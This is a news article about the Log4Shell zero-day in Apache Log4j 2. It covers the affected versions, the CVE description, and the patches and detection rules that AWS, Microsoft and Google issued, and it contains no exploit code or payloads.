A zero-day exploit first spotted in the popular game Minecraft has IT departments around the world rushing to update the popular Apache Java-based logging software.
Hyperscalers and others issued patches and warnings over the weekend following news of a zero-day exploit in the popular Apache Log4J 2 library. Attackers can gain full control of systems affected by the bug. Exacerbating the severity of the news, the exploit has been seen in the wild, according to reports. Hyperscalers provided guidance to customers over the weekend to mitigate the exploit and details on affected customer-facing services.
The exploit, known colloquially as Log4Shell and also as LogJam, was first noticed in the hugely popular game Minecraft. Developer Mojang Studios rushed out a patch and told users to update affected servers and systems.
“Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled,” reads the Common Vulnerabilities and Exposures (CVE) entry.
Apache Log4J 2 is an open-source logging library used in Java programming. Developed by the Apache Foundation, Log4J 2 is widely popular and used in many applications, including enterprise and cloud services. All Log4J versions between 2.0 and 2.14.1 are affected by the bug. That includes many cloud services and applications which have those versions of Log4J as a dependency.
According to the report, this behavior has been disabled in Log4J 2.15.0 and later versions.
Hyperscalers act swiftly on Log4J 2
Hyperscalers wasted no time getting the word out over the weekend and putting mitigation strategies in place. AWS posted a warning for its customers to let them know of the issue, encouraging those who manage environments to update to the latest version.
AWS noted that has updated or is in the process of updating internal services which use Log4J. Those include CloudFront, its Content Delivery Network (CDN). AWS said that many services were already updated or unaffected.
Microsoft issued a response that included mitigation guidance for affected services on Microsoft Azure.
“The scope of impact has expanded to thousands of products and devices, including Apache products such as Struts 2, Solr, Druid, Flink and Swift. Because this vulnerability is in a Java library, the cross-platform nature of Java means the vulnerability is exploitable on many platforms, including both Windows and Linux,” said Microsoft.
Google said that customers of Google Cloud Armor, its network security service, can download a new Web Application Firewall (WAF) rule to detect and, optionally, block the exploit. The company also updated Google Cloud IDS, its Intrusion Detection System (IDS), has also been updated.
Google Cloud IDS is network security software for businesses that host Virtual Private Clouds (VPC) on Google Cloud. It provides a unified interface to provide threat detection, replacing “patchwork” solutions. Last week Google released IDS in all regions. It debuted as a preview in limited release over the summer.